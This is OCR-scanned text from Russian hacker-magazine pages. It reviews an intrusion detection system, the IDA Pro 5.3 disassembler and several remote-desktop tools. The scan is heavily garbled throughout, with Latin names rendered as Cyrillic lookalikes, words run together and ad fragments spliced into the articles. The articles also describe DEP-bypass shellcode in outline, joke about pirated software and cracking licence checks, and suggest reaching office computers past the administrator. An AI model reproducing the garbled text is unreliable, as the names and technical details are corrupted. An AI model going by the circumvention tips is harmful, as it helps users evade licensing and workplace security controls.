поддающегося анализу (взять хотя бы нашумевший КизПэск.С, когда реверсеры 
рвали на себе волосы в разных местах, умоляя бога послать им дроппер — тот 
код, который забрасывает Кизвэск на заражаемые компьютеры) . 



прочности. 

Программная составляющая представляетсобой дистрибутив 
в формате гргш, требующий процессор не хуже Р-4, опера- 
ционную систему типа Еебога Соге 6 и, как минимум, одну 
сетевую карту. На ѴѴІпбоѵѵз АМР не устанавливается принци- 
пиально, но... на этот случай существуют виртуальные машины 
со своими виртуальными сетями и сетевымитрансляторами, 
связывающими виртуальную сетьс внешним миром. 

В зависимости от целей, преследуемых пользователем, вари- 
анты установки варьируются в широких пределах. Если нам 
нужна система обнаружения вторжений, мы просто ставим 
Федору на ѴМ ѴѴаге, инсталлируем АМР и даем ей доступ к фи- 
зической сети, чтобы она ловила все проходящие пакеты, рас- 
познавая атаки (какуспешные, таки обломавшиеся) вместесо 
следами присутствия малвари. Это открываетогромное поле 
для экспериментов, позволяя, в частности, коллекциониро- 
вать свежих червей и вести мониторинг вирусной активности. 
Функционируя в режиме Ю5 (системы обнаружения втор- 
жений), АМР никак не защищает компьютер от атак, а лишь 
информирует, что нас поимели. Гм, ну это мы и без АМР рано 
или поздно узнаем. Как насчет укрепления линии обороны? В 
идеале нам потребуется отдельный компьютер, включенный 
в разрыв сетевого кабеля. Но в «бюджетном» варианте можно 
обойтись и без него, воспользовавшись всетой же ѴМ ѴѴаге, 
чья виртуальная сеть конфигурируется так, чтобы весьтрафик 
проходил через гостевую операционную систему с АМР 
— тогда АМР получит возможность блокировать вредоносные 
пакеты в реальном времени без отрыва от производства. 
Однако при этом придется задействовать ЫАТ (транслятор се- 
тевых адресов, встроенный в ѴМ ѴѴаге), а через ЫАТ работают 
далеко не все программы или работают, но в ограниченном 
режиме (к примеру, Осел). К тому же, такая схема защиты не 
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Детальная информация по отдельно взятому 
инциденту с возможностью скачивания экзем п 
ляра червя (разной степени «потрепанности») 
на свою локальную машину 



предотвращаетатаки на ТСР/ІР-стекбазовой 
операционной системы, в котором также имеют- 
ся дыры. Впрочем, подавляющее большинство 
дыр сосредоточено в прикладных протоколах 
и приложенияхтипа ІЕ, а дыры в ТСР/ІР-стеке 
— это целое событие! И такие события можно 
пересчитать по пальцам одной руки. Ну, хорошо, 
двух рук — но уже за все время существования 
І\ІТ. 



Н ПОЧЕМУ ЭТО РАБОТАЕТ? 

Проникнуть на компьютер, защищенный 
ЗпогЕом, АМР или другой качественной ІР5, 
практически невозможно. Допустим, хакер 
обнаружил новую, еще никому не известную уяз- 
вимость в... ну, это, впрочем, неважно. Допустим, 
также, что атака основана на переполнении бу- 
фера, ажертва используетХР5Р2+саппаратным 
О ЕР, задействованным для всех приложений. В 
этом случае первая фаза атаки — копирование 
вЬеІІ-кода из стека в специально выделенную 
область памяти с атрибутами, разрешающими 
чтение, запись и выполнение. Технически это 
реализуется через последовательность вызовов 
АРІ-функций, чьи адреса хакер засылает в 
стек, что легко описывается языком сигнатур и 
распознается системой обнаружения вторжений 
независимо оттого, какое именно приложение 
(или сетевая служба) атакуется. 

В умелых руках АМР превращается в мощный 
инструмент борьбы сагрессорами, действующий 

на автопилоте и нетребующий внимания со стороны оператора. Ксожале- 
нию, если за компьютером сидит существо типа «секретарша», то... АМР 
эффективно парситТСР-протокол с сетевого уровня и декодирует НТТР, а 
также файлы различных форматов, такие, например, как М5 ѴѴогсІ или РОЕ 
— в нихтоже встречаются ошибки переполнения! Достаточно лишь открыть 
их. Увы, РОЕ, выложенный на ѴѴЕВ/ЕТР, распарсить (на сетевом уровне) 
еще возможно, но это уже предел (во всяком случае, для АМР). Тотже самый 
РОЕ, начиненный вЬеІІ-кодом иупакованный 2 Ір’ом или гаг’ом на сетевом 
уровне ни АМР, ни другие системы обнаружения вторжений не распарсят, 
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В Сети сви репствует червь ѴѴогт.АІІарІе-2, совершающий набеги на беззащитныеузлы 



ибо если парситьабсолютно все — никаких вычислительных мощностей не 
хватит, и мы получим та кие тормоза, что ну ее на фиг эту безопасность. 

Тоже самое относится и кобычным исполняемым файлам, внутри которых 
может находиться что угодно: отАбѴѴаге до троянских коней. АМР в 
принципе незащищает от атак подобного рода. Это все-таки неантиви- 
рус. Аантивирусы известно где — на ѴішзТоІаІ. АМР плюс ѴігизТоІаІ (или 
локальный антивирус), плюс песочница типа Ыогтап Запсі Вох — хоть и не 
панацея, но в совокупности обеспечиваютвполне приемлемый уровень 
защищенности. ~н~ 
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ЧЕМ НАС ПОРАДОВАЛ СВЕЖИИ РЕЛИЗ ДИЗАССЕМБЛЕРА ША РРО 



Свершилось! ГОАРго 5.3 уже в продаже (и даже в Осле)! Ослепительный 
фейерверк новых фич, полностью переписанный отладчик, сотни исправ- 
ленных ошибок, дефектов и глюков старой версии, более полная экстракция 
отладочной инфы, модули для іРЬопе, ЗутЪіап 05, Ілпих’а и куча всего того, 
о чем прежде оставалось лишь мечтать. Мы это уже пощупали! 



свежим воспоминания. Изначально ЮА представляла 
собой интерактивный дизассемблер, радикальным образом 
отличающийся от пакетных дизассемблеров своего времени. 
Те лишьзаглатывали бинарный код, выдавая на выходе 
ассемблерный листинг. Над которым приходилось кропотливо работать, 
составляя втекстовом редакторе специальные правила для дизассембле- 
ра, объясняющие, где он накосячил и какэто надо было дизассемблиро- 
вать. После чего весь процесс повторялся. Хакер опять изучал полученный 
листинг, составлял новый список правил... и мучился такдо полного 
изнеможения. 



Ильфак, создатель ЮА, был первым, кому пришла в голову идея прикрутить 
кдизассемблеру интерактивный движок, тесно взаимодействующий с 
пользователем и позволяющий решать практически все мыслимые и не- 
мыслимые проблемы. Приемы против дизассемблеров перестали работать, 
поскольку теперь защитам приходится воевать не с тупым дизассемблером, 
а мыслящим хакером, сидящим за штурвалом. 

Сначала ЮА приобрела поддержку макросов и скриптового языка, напоми- 
нающего сильно урезанный Си. Скрипты, написанные хакерами, нетолько 
автоматизировали взлом, но и позволяли распаковыватьупакованный 
код прямо в ИДЕ. Оченьудобно, хотя ограниченные возможности скрип- 
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Символьная информация, добытая старой (слева) и новой (справа) версиями 
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Результатдизассемблирования одной итой же программы старой (слева) и 
новой (справа) версиями ЮА Рго 




тов тормозил и прогресс. И вот, наконец, появились плагины, дающие 
полный доступ к внутреннему АРІ ИДЫ. Плагины пишутся на приплюснутом 
Си — пишутся долго и совершенно ненаглядно. А потому хакеры тутже 
прикрутили к ИДЕ всевозможные языки типа РегГа и РуіИоп’а, делающие 
программирование простым и понятным, без отрыва от производства, в 
смысле, без выхода из дизассемблера. 

За время своего существования ЮА Рго превратилась в настоящую хакер- 
скую империю. Это намного больше, чем дизассемблер. Это и дизассемб- 
лер, и отладчик, и распаковщикупакованных файлов, и анализатор потока 
управления, и сканер безопасности для полуавтоматического поиска дыр в 
приложениях. Целый мир с возможностями, которые с выходом очередной 
версии всебольше приближаются к без граничным. 

В ОТЛАДОЧНЫЕ ВОЗМОЖНОСТИ ША РКО 

Способы исследования программ делятся на две категории — статический 
анализ (дизассемблирование) и динамический (отладка). Обе категории 
имеютсвои сильные и слабые стороны, а потому на практике активно 
применяется гибридный способ, открывающий большие возможности, 
но вынуждающий хакера попеременно мотаться отдизассемблера к 
отладчику, снимая дампы памяти и перетягивая символьную информацию 
в обоих направлениях. Это ужасно напрягает и приводит к неоправданному 
перерасходу времени. 

Отсюда и родилась идея — встроить отладчик непосредственно в сам 
дизассемблер. Ильфакбыл не первым, кто это осуществил (определен- 
нымуспехом до него пользовался знаменитый \А/320азпп), да и первые 
попытки создавали крайне неблагоприятное впечатление — отладчик, 
встроенный в ЮА4.Х, на фоне Ольги выглядел детской игрушкой, не говоря 
уже о могучем ЭоЙІСЕ. С выходом версии 5.x ситуация слегка изменилась, 
и ЮА-отладчик дорос до минимально потребного уровня. ЭоЙІСЕ ктому 
времени уже превратился в разлагающийсятруп, зато Ольга существенно 
упрочнила свои позиции, собрав нехилую коллекцию плагинов и скриптов, 
которой не могла похвастаться ЮА5.Х 

ЮА5.3 совершила отчаянный рывок, попытавшись переплюнуть Ольгутам, 



Свободный 
бзор новых 
возможностей 



• Полностью переписано ядро отладчика — усилена поддержка 
многопоточных приложений (в том числе, в Ілпих) и улучшена обра- 
ботка структурных исключений. 

• Добавлены отладочные модули для іРЬопе и ЗутЬіап 08, постав- 
ляемые вместе с исходными текстами, что позволяет их совершенство- 
вать самостоятельно, не дожидаясь выхода новой версии — отличная 
новость для всех хакеров, обитающих на мобильных платформах и 
смартфонах. 

• Радикально улучшена поддержка РІС-кода (Розпіоп-Іпсіерепсіепі: 
Собе — Позиционно Независимый Код), встречающегося в зЬеІІ-ко- 
дах, а также многих защитных механизмах, что облегчает жизнь как 
исследователям малвари, таки кодокопателям, освобождающим 
программы от оков ключевых файлов, серийных номеров и прочего. 

• Более качественная экстракция отладочной информации из М8 
РПВ-файлов — интересна главным образом исследователям недр опе- 
рационных систем семейства N7. А также хакерам, анализирующим 
изменения в заплатках от МісгозоЙ: на предмет поиска дыр, которые 
они затыкают, чтобы заточить ехріоп под непатченные системы (или 
даже пропатченные, ибо большинство дыр затыкаются далеко не с 
первого раза) . 

• Языковые расширения от независимых разработчиков (типа 
ГОА Регі, ГОА РуіЬоп) приобрели официальный статус, а вместе с ним и 
официальный АРІ для взаимодействия с ГОА Рго, существенно облег- 
чив процесс стыковки ГОА Рго с различными интерпретаторами. 

• Проделана огромная работа по исправлению ошибок. По 
сути, ГОА Рго 5.3 представляет собой огромный Ьи§-йх. Только один 
официальный список изменений насчитывает свыше сотни фиксов. 
Подлинное число гораздо больше и часть ошибок исправлено «вти- 
хую». Достаточно взять хотя бы ошибку с отладкой файлов, имеющих 
нулевой базовый адрес, что в предыдущих версиях приводило к 
потере контроля над отлаживаемой программой (подробнее — зоигіг, 
ѵѵогбргезз.сот) . В 5.3 это уже исправлено, однако баг в официальном 
списке не значится, что наводит на определенные размышления. 

• Обновлена сигнатурная база для новых версий компиляторов от 
Вогіапб, МІСГ050Й: и некоторых других, что полезно практически всем 
реверсерам без исключения. 
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Современная ЮА Рго с кучей «косметики» и прочих графических«бантиков», застав- 
ляющих хакеров старого поколения скрежетать зубами. Зато новому поколению все это 



где она никогда не была сильна — в отладке многопоточных 
приложений и обработке структурных исключений. И это, надо 
сказать, ей удалось. Кдостоинствам относятся и полная интег- 
рация с дизассемблером, которая экономит немало времени. 
Плагины и скрипты для Ю А- отладчика уже начинают появ- 
ляться, в дальнейшем их число будеттолько расти. Впрочем, на 
ѴѴІпсІоѵѵз-платформе Ольга не собирается сдавать свои позиции 
(особенно, в свете грядущего выхода версии 2.x). К Ольге хакеры 
уже привыкли, а в ЮАРго все по-другому. Интерфейс продуман 
не лучшим образом, да и сами отладочные возможности пока 
все-таки слабоваты. 

Зато на І_іпих-платформе отладчик ЮА Рго смотрится более 
соблазнительно, чем ОБВ. Хотя ЗОВ — куда более мощная 
штука, онтребует времени на изучение. А ЮА Рго предостав- 
ляет интерактивный и интуитивно понятный интерфейс, пере- 
плевывающий практически все конкурирующие отладчики. Во 
всяком случае на прикладном уровне (ну, а на ядерный ЮА Рго 
пока и незамахивалась). 

А в сфере мобильных устройств отладочные возможности 
ЮА Рго (какими бы скромными не были) всегда вызывали 
огромный интерес, учитывая появление большого количества 
малвари под мобильныеустройства и защищенных программ, 
у которыхтак и хочется отломать все ненужное. 

Н ДИХЛОФОС, ХЛОРОФОС, КАРБОФОС... 

ЮАРго — сложный программный комплекс, разумеется, не 
лишенный ошибок. Ошибки, какизвестно, бывают разные: 
от вполне безобидных до коварных и разрушительных. Крах 
базы ЮА Рго (на легальных, а не ломаных версиях) — явление 
достаточно редкое, но все-таки встречающееся. Впрочем, это 
не создает большой проблемы, если периодически сохранять 
результатдизассемблирования на диск вупакованную базу 
— практически у всех хакеров уже давно выработался стойкий 
инстинкт. Ну а кто не сохраняется, тот сам виноват. 

Ошибки в «движке» дизассемблирования, приводящие квы- 
даче неверного результата, намного более коварны, поскольку 
коверкаютлогику работы анализируемой программы, делая 
ее совершенно непонятной. Над подобными головоломками 
можно биться часами (если под рукой нетдругого дизассемб- 
лера, чтобы сравнить результаты) и они — самое большое зло 



очень нравится 




> Ипкз 

ѵѵѵѵѵѵ.Ьех-гаѵз.сопп/ 
ісіарго — официальный 
сайт, где выложена 
сама ША Рго, сопрово- 
дительная докумен- 
тация, куча примеров 
и бесплатныхутилит. 
Также имеется форум 
(впрочем, доступный 
только легальным 
пользователям). 




> ІП^О 

Одним из самых 
популярных плаги- 
новдля ЮА является 
НехРауз, позволяю- 
щий преобразовать 
бинарникв код на С++. 
Подробности — 
в февральском номере 
][за этот год. 





для реверсеров, какоетолько можно представить. 

Хакеры бессознательно доверяют ЮА Рго, считая ее 
непогрешимой, хотя она ошибается намного чаще, чем 
конкурирующие дизассемблеры. Касательно движка для 
х86 процессоров, ЮА Рго 5.3 наконец-то научилась распоз- 
навать 1Ю2-инструкцию, специально предназначенную для 
исключения «неверный опкод» и встречающуюся во многих 
защитах. Тоже самое относится и кЗхбайтовым ЫОР-инструк- 
циям (ОР 19. ,0Р 1 Е), которые в списке изменений значатся как 
недокументированные, когда на самом делеони оченьдаже 
документированные ( Ильфа к не читает мануалов?!). 
Нераспознанные инструкции, представленные в виде данных, 
конечно, сбиваютхакера столку, но всеже не срываютему 
крышу и не высаживают на измену. Берем мануалы, изучаем, 
определяем опкод вручную, вручную жетранслируем задан- 
ную последовательность байт в соответствующую инструкцию 
(благо, ЮАРго это позволяет) и пьем пиво. Или квас. 

Хуже, когда ЮА Рго пакостит втихую. Например, неучитывает 
команду БЕС/ІЫС 5Р в 32-разрядном сегменте, что приводит 
к неверно вычисленным смещениям локальных переменных 
и аргументов, а, как следствие, к неверному анализу всей 
функции в целом. Процессорный модульдля платформы .ЫЕТ 
также еще толком не отлажен, хотя появился не вчера и даже 
не позавчера. ЮА Рго 5.2 неверно декодировала команды 
сопѵ.г4, сопѵ.г8 и сопѵ.г.ип. В версии 5.3 это исправлено. 

Самая приятная новость — функции с ЕН_рго1од наконец-то 
дизассемблируются правильно!!! Соль втом, что класси- 
ческий прологустанавливает ЕВР на самое дно стекового 
фрейма, и потому все локальные переменные приобретают 
отрицательные смещения, а все аргументы — положительные. 
Функции с Е прологом Н_ргоІод делят стековый фрейм на две 
части. В одну попадаютбуфера, в другую — скалярные пере- 
менные и указатели. Впервыеэта техника была применена в 
рго-роіісе (бесплатном расширении для знаменитого ѲСС- 
компилятора) для борьбы со стековыми переполнениями, а 
затем была «позаимствована» компанией МісгозоЮ Регистр 
ЕВР устанавливается на границу, отделяющую буфера от 
не-буферов. Буфера приобретают отрицательные смещения, 
а скалярные переменные, указатели и аргументы — положи- 
тельные, но вплотьдо версии 5.2 (включительно) ЮА Рго об- 
зывала их всехаргументами, озадачивая хакеров — мол, какая 
интересная функция! Ей передали пару-тройку аргументов, 
а она приняла на грудь целый десяток, оперируя ими, какни в 
чем не бывало. Приходилось выкручиваться, танцуя с бубном. 

В версии 5.3 это исправлено, и бубен можно положить на полку. 
Исправление ошибок нужнотолько приветствовать. Очень 
приятно, что Ильфак предпочитает гонять баги, тогда как 
большинство компаний тяготеют к л ихорадоч ному добавле- 
нию новых фич, исправляя ошибки л ишь тогда, когда они уже 
всех достанут. С другой стороны, не совсем радует политика 
обновлений. Если ЮА5.3 фактически представляет собой 
один большой баг-фикс (не без новых возможностей, конечно), 
почему бы ее не раздавать бесплатно всем желающим в виде 
заплатокдля всех измененных файлов? Місгозоб:, АбоЬе и еще 
куча других компаний делают это даже без проверки лицен- 
зии. Брать с пользователя деньги за исправление своих же 
ошибокэто, знаете ли, может делать только Ильфак, который 
сменил Пьера (не Безухова), и теперь он СЕО. Похоже, готовит- 
ся забросить кодинг и заняться бизнесом, чего, впрочем, уже 
давно следовало ожидать, наблюдая агонию развития ЮА Рго 
на протяжении последних пяти лет. Реально новых идей нет, 
реально новых фич — тоже. Ате, что есть — настоящим хаке- 
рам либо не нужны (графы, декомпилятор) и годятся только для 
привлечения «пионеров», либо же недостающий функционал 
покрывается скриптами и плагинами. 



► ОЗО 
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г ПЕРЕХОДИТЬ ИЛИ НЕТ? 

Само по себеусиление отладочных возможностей — еще не повод поку- 
патьновую ЮАРго (нохороший повод обновитьсятем, ктоеще неуспел 
этого сделать), и, естественно, не повод мигрировать с Ольги на ЮА Рго. 
Тем не менее, удобства интегрированного отладчика — очевидны. 
Такстоитли переходить на новую версию ША Рго или нет? Естест- 
венно, для тех, кто выловил ее в Осле, вопрос вообще не стоит. Халява! 
Профессиональные реверсеры, работающие на респектабельные фирмы, 
тоже не заморачиваются та ким и вещами — фирма предоставляет ревер- 
серу все необходимое, втом числе и последние версии ЮА Рго, а если не 
предоставляет — зачем работать в такой фирме? 

Фрилансерам и независимым консультантам приходится хуже всего. 
Никто им на халяву ЮА Рго не даст. Пользоваться ворованной версией 
в общем случае противозаконно и весьма чревато (особенно при работе 
на зарубежные компании). Однако если за реверсии г платят, то с учетом 
текущих расценок новая ЮА окупается буквальноза несколько дней. В 
худшем случае, за неделю. Ну, пускай за месяц (смотря, какая у реверсера 
квалификация). 

Авоттем, кто пишет плагины для ЮА Рго (и не просто пишет, а еще и про- 
дает их), выход всякой новой версии, как нож в сердце. Совместимость, 
мягко говоря, здесь и не ночевала. Всю коллекцию плагинов приходится 
тестировать заново, добавляя многочисленные #ібс!еГ ы для обеспечения 
совместимости со всеми версиями или отбранчивая код (в клинических 
случаях), причем эта работа не окупается, поскольку поддержка продан- 
ных плагинов стоит копейки, а времени отнимает... на рубли, фунты и 
стерлинги. 

Воттакая непростая ситуация получается. Нас вынуждаютобновляться 
независимо оттого, желаем ли мы этого или нет. Ну что ж, Ильфактоже 
хочет кушать, т 





Самая первая версия ЮА(вте времена еще не Рго), сейчас представляю- 
щая разве что исторический интерес музейного экспоната 
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Р45 Ріатопсі 

і Поддержка процессоров Іпіеі Соге 2 
с возможностью разгона Р5В выше 
2000 МГц 

і Поддержка памяти ОРКЗ-2000 
■Р Вторичный источник питания на 
микросхемах ЭгМОБ 
■Р Жидкостное охлаждение Сігси-Ріре 
# Поддержка АТІ СгоззРігеХ 



ѵѵѵ\мллтісго5Іаг.ги 

ч 











^ рс_гоп 




УДАЛЕНКА 
ПО-ХАКЕРСКИ 



НОВЫЕ СПОСОБЫ ПОДКЛЮЧЕНИЯ ПО УДАЛЕННОМУ РАБОЧЕМУ СТОЛУ 



Настроить удаленный сервер. с вирусом. Ска- 

зать чер ез инет документы, заб ытые на домашнем компьютер е. Да просто 



постебаться над ламером! Че го только не сделаешь, если есть ^ аленный до- 



ступ к рабочему столу. И он использовать несколько 



□ ного лет назад, когда все вокруг болели локальными сетями, 
а всеобщим любимцем был ресурс паа.ги . я с огромным удо- 
вольствием занимался собственной локалкой. Все началось 
с кластера внутри квартиры, продолжилось сеткой в доме и в 
квартале, а закончилось— пирингом с другими сетями посредством оптики 
иѴѴИі. Без удаленного доступа втакихусловиях было нежить. Приходилось 
нетолько администрироватьсерверы и роутеры, ноеще и помогать обыч- 
ным пользователям, подключаясь к ним через излюбленную прогу ГСетоІе 
Асітіпізігаіог, о существовании которой знали даже самые ушастые. Но это 
были старые добрые времена, а теперь необходимость в удаленном доступе 
естьу каждого. Вуниверелиты, школе или офисе (а может быть, тупо в 
интернет-кафе), всегда хочется иметь лазейку к самому святому — своему 
домашнему компьютеру. Ну, хотя бы на всякий случай. Другое дело, что доб- 



раться до него сквозь многочисленные роутеры, файрволы, ЫАТ'ы и прочие 
ограничения, зачастую даже не зная ІР сервера, уже не та к просто. 

Объясню на пальцах. С обычной локальной сетью, как правило, проблем 
не возникает. У каждого из компьютеров есть свой ІР-адрес и Ьозіпаппе, 
поэтому «достучаться» до любого из них нетаксложно. На управляемый 
компьютер устанавливается серверная часть программы для удаленного 
доступа. Например, ГСетоІе Асітіпізігаіог или различные модификации 
ѴМС, у которой есть версии для самых различных операционных систем. 

С любого другого компа при помощи клиентской части осуществляется 
соединение после простого ввода ІР-адреса или имени компьютера. К 
сожалению, в интернете статический и реальный ІР-адрес — большая 
редкость. Вариантов несколько. Если ІР-адрес постоянно меняется, но он 
все-таки реальный (белый), то ситуация легко решается использованием 
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специального сіупсіпз-сервиса. Этот сервер совершенно 
бесплатно хранит запись о выбра ином тобой доменном имени, 
скажем, тѵвегѵег.сіѵпсіпв.огд . в которой есть актуальный ІР- 
адрествоего компьютера. Он постоянно обновляется за счет 
клиентской части, установленной утебя в системе. Другими 
словами, для соединения сэтим компьютером необязательно 
знать его ІР-адрес, для подключения используется как раз 
доменное имя. Но намного чаще провайдеры выдают один и 
тотже ІР-шник (его еще называют«серым») сразу сотням, а 
то и тысячам пользователей. В этом случае достучаться до кон- 
кретного компьютера извне без дополнительныхухищрений 
уже не получится. 

Н ХИТРЫЙ ПОДХОД: ПОДНЯТЬ ѴРЫ-СОЕДИНЕНИЕ 

Хорошим выходом из положения будет поднять поверх инета 
виртуальную сеть (ѴРЫ) и работать точно также, как в обычной 
локалке. То есть, использовать внутренние ІР-адреса и не 
морочить голову вопросом, как будут передаваться сетевые 
пакеты на самом деле. 

Поднимать для этого какой-то серьезный софт в нашей 
ситуации просто глупо. Ксчастью, есть одна замечательная 
программа, рассчитанная как раз на самых обычных пользо- 
вателей. Речь идет об утилите НатасЫ ( ѵѵѵѵѵѵ.ЬатасЫ.сс ). Ее 
уникальность в простоте настройки ѴРМ-соединения, которую 
полностью берет на себя управляющий сервер. Для создания 
закриптованного канала пользователи сначала подключаются 
кнему, получают необходимые для соединения инструкции и 
только затем устанавливают коннект между собой. Послетого, 
как связь налажена, дальнейшее посредничество сервера 
исключается, поэтомутрафик передается исключительно 
между пользователями. 

На практике такой подход выглядитеще проще. После 
установки НатасЫ в системе появляется виртуальный 
сетевой адаптер, но браться за его настройку не стоит. Все 
управление осуществляется в специальном окошке, сильно 
похожем на обычный ІМ-мессенжер. Первым делом необхо- 
димо подключиться к управляющему серверу, а после этого 
— создать свою виртуальную сеть, нажав на правую нижнюю 
кнопку. Во время регистрации ѴРЫ необходимо ввести 
ее имя и пароль — эти параметры в дальнейшем будут 
использоваться другими компьютерами для подключения 
к виртуальной сети. Собственно, на этом вся настройка и 
заканчивается. Тебе остается только присоединить оба 
компьютера к одной и той же ѴРЫ-сети и пробовать пропин- 



говать их по внутренним ІР-шникам, указанным в верхней 
части окна НатасЫ. Все должно заработать без какой-либо 
дополнительной настройки! Каждому юзеру будет выдан 
уникальный внутренний ІР (к примеру, 5.0.0.53), а также 
специальный идентификатор, по которому другие поль- 
зователи могуттебя распознать. Неважно, какой именно 
софт будет использоваться (игры, чаты, файлообменники 
и т.п.) — НатасЫ все равно установит прямое соединение 
и непрерывное кодирование данных. Приятный момент 
заключается в том, что работе этой системы немешаютни 
ЫАТ'ы, ни брандмауэры, ни капризы системного админис- 
тратора. Версии клиента существуют нетолько под Винды 
(на многих языках, включая русский), но и Ыпих, что вдвой- 
не приятно. Ты не только сможешь использовать привычные 
инструменты для удаленного управления, но и наслаждать- 
ся всеми прелестями обычной л о калки, например, играми. 
Хочу обратить внимание, что количество пользователей в 
ѴРЫ-сети вовсе не ограничивается двумя компьютерами. 

Их может быть гораздо больше! 

Теперьо безопасности. Во время регистрации клиент 
генерирует пару П5А-ключей (один — публичный, другой 
— скрытый), которые применяются для авторизации на 
сервере. Шифрование данных основывается на алгоритмах, 
применяемых в ІР5ЕС и ЭВЬ и давно заслуживших доверие. 
Этом, что разработчики подошли к вопросу безопасности со 
всей строгостью, можно судить даже по разным продуманным 
мелочам. Например, во время установки клиента, установщик 
спрашивает разрешение на блокировку всех потенциально 
опасных служб ѴѴІпсіоѵѵб, которые включены поумолчанию и 
могут предела влятьугрозу для безопасности. Правда, помимо 
всего прочего программа заблокируети файловый шаринг: 
обратиться кудаленным файлам и папкам посредством при- 
вычных средств Винды уже не удастся. 

0 УНИВЕРСАЛЬНЫЙ ПОДХОД: 

ИСПОЛЬЗОВАТЬ СЕРВЕР-ПОСРЕДНИК 

НатасЫ уста на вливает в систему свой виртуальный драйвер, 
а, значит, для установки, как ни крути, нужны права админист- 
ратора. А гдеж их взять, если доступ необходим к компьютеру, 
находящемуся в офисе, а непонятливый админ никогда не 
пойдет на установку софта для удаленного управления ради 
обычных смертных? Можно, конечно, это обойти, но лучше 
поступить по-другому: просто справляться без привилегий 




> ІП^О 

• Сервис зкуіехюот 
предоставляет воз- 
можность удаленного 
доступа прямо через 
браузер (правда, 
поддерживает только 
ІЕ), но в концепции 
удаленного помощни- 
ка. Желающие могут 
запросить помощь, 

а другие — могут им 
помочь. За денежки. 
Той же концепции 
придерживается 
сорііоі.сот . 

• У программы 
ТеатѴіеѵѵегесть прак- 
тически 100% аналог, 
но с русским интер- 
фейсом — Атплуу 
Аззізіапі: ( ѵѵѵѵѵѵ.аттуу. 
сот ). 

• Для обхода файрво- 
лов и МАТ программа- 
ми используются хит- 
рые методики: 5ТІІІМ, 
ІШРИоІерипсЬіпд и 
ВасксоппесС 
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Я лично сталкивался стакой проблемой несколько раз, и 
каждый раз меня выручала замечательная утилита и онлайн- 
сервис ТеатѴіеѵѵег ( ѵѵѵѵѵѵіеатѵіеѵѵег.сот ). В первую очередь 
необходимо скачать с офсайта дистрибутив программы. 

Он без проблем установится в любой системе, несмотря на 
отсутствие прав администратора, но даже если этому что-то 
помешает— разработчики любезно предоставили на сайте 
рогіаЫе-версию своего приложения. Послезапуска утилита 
обращается на специальный сервер, который возвращаетей 
уникальный идентификатор и пароль: например, 24 1 53 297/ 
3280. Все:теперь подключиться кнемуты сможешь с любого 
другого компьютера, где также установлен ТеатѴіеѵѵег. Просто 
введи данные на клиентской машине, выбери Петоіе виррогі 
и смело жми на «СоппеШо рагіпег». Секунда и... доступ куда- 
ленному рабочему столу получен. Черт подери, какже хорошо 
это работает! 

Главная особенность такой организации подключения 

— возможность работы через любые файрволы и ЫАТ! Не надо 
морочитьсебе голову пробросом портов, хитрой маршрутиза- 
цией ит.п.,тутвсе просто, как дважды два. 

Качество картинки легко настроить в соответствии с 
каналом: мы специально проверяли ТеатѴіеѵѵег на очень 
слабом канале, соединяясь с компьютерами в Уругвае 

— все просто летает. Более того, прога позволяетудобно 



АкакжеЗЗН? 



Во многих случаях вовсе не обязательно прибегать к удаленному рабочему столу. 
Обычной консоли вполне достаточно, чтобы подправить конфиг в каком-нибудь 
демоне. На любой піх-машине ЗЗН-демон уже давно стал стандартом де-факто, 
но эта история не про ѴѴіпсІоѵѵз-серверы. Долгое время единственным полно- 
ценным решением для настройки Зесиге ЗЬеІІ под Виндой был платный продукт 
ѴЗЬеІІ от компании ѴагШуке ГѵапсІуке.соігО . разработавшей популярный клиент 
ЗесигеСКТ. К сожалению, толку от демо-версии немного. Даже для того, чтобы 
скачать ее с офсайта, придется попыхтеть. Поэтому появлению альтернативы в 
виде МоЬаЗЗН Г тоЬаззЬ.тоЬаЩк.пеЕ/епЛ я лично очень обрадовался. А когда 
ее опробовал, обрадовался вдвойне, потому что буквально за минуту получилось 
поднять ЗЗН-сервер с привязкой к пользователям, которые созданы в системе. 
Простая проверка соединения с разных виндовых и никсовых клиентов показала 
100% совместимость. Да, эта штука работает! И теперь безопасный доступ к 
командной строке через стандартные протоколы, проброс портов и туннелиро- 
вание действительны и для Винды! 



передавать файлы и управлять питанием компьютера, 
в том числе быстро отправляя компьютер в ребут. А чего 
стоит возможность установки ѴРЫ-соединения — полу- 
чается тот же самый НатасЫ, правда, также требующий 
установки специального ѴРЫ-адаптера. Если требуется 
записать все действия на удаленном компьютере или что- 
то сказать собеседнику посредством чата — нет проблем, 
соответствующие функции доступны даже в бесплатной 
версии программы. Кстати говоря, недавно появилась 
версия и для Мае- пол ьзователей, а в скором времени 
обещается выйти порт для І_іпих-систем. Мы искренне 
этого ждем ! 

Н ѴѴЕВ2.0 ПОДХОД: 

АДМИНИМ ПРЯМО ЧЕРЕЗ БРАУЗЕР 

Мне довольно часто приходится ездить между городами, и, 
ксожалению, ноутбук не всегда со мной. После нескольких 
срочных ситуаций, когда доступ кудаленным компьютерам 
нужен был «здесь и сейчас», а компьютера или хотя бы интер- 
нет-кафе (где бы я без труда запустил Теат Ѵіеѵѵег) рядом не 
было, пришлось изрядно подумать, какбыть. Арешение, как 
это обычно и бывает, оказалось ну просто максимально эффек- 
тивным. После недолгих поисков выяснилось, что в инетеуже 
достаточно давно функционирует отличный сервис БодМеІп 
[ Іодтеіп.сот і. В чем его фишка? А втом, что клиентская часть 
для управления удаленными компьютерами и серверами 
реализована в виде обычной веб-страницы и работает прак- 
тически из любого браузера (ІЕ, Орега, Рігеіюх, Заіагі) и даже с 
моего коммуникатора! 

Подход просто изумительный: ты регистрируешься на сайте 
(само собой, бесплатно) и получаешьдоступ ксвоей собст- 
венной панелиуправления. Вэтой панели отображают все 
компьютеры, на которых установлена специальная серверная 
часть. Не надо запоминать ІР-шники, порты и вообще замо- 
рачиваться какими-либо техническими вопросами. Ты просто 
заходишь в свою панель, выбираешь нужныйтебе компьютер 
(статус каждого наглядно отображается пиктограммами) и кон- 
нектишься излюбойточки мира, не задумываясь о проблемах 
с ЫАТ'ом или брандмауэрами. И вот что я тебе скажу: несмотря 
на работу через браузер, удаленный рабочий стол работает 
отменно. 

Единственные ограничения бесплатной версии по сравнению 
с Рго-братом заключаются в отсутствии звука с удаленного 
компьютера и возможности бгад’п'сігор’а файлов между 
текущим и удаленным компьютером. Но ведь без этого вполне 
можно прожить, правда? 
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СоппесіЫоѵѵ — новый 
сервис от компа- 
нии АсІоЬе, который 
позволиторганизо- 
вать Ретоіе Оезкіор 
используя один лишь 
браузер (как на серве- 
ое, так и клиенте) 



5.235 59 56 
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Главное окно НатасЫ похоже на 
современный мессенжер 



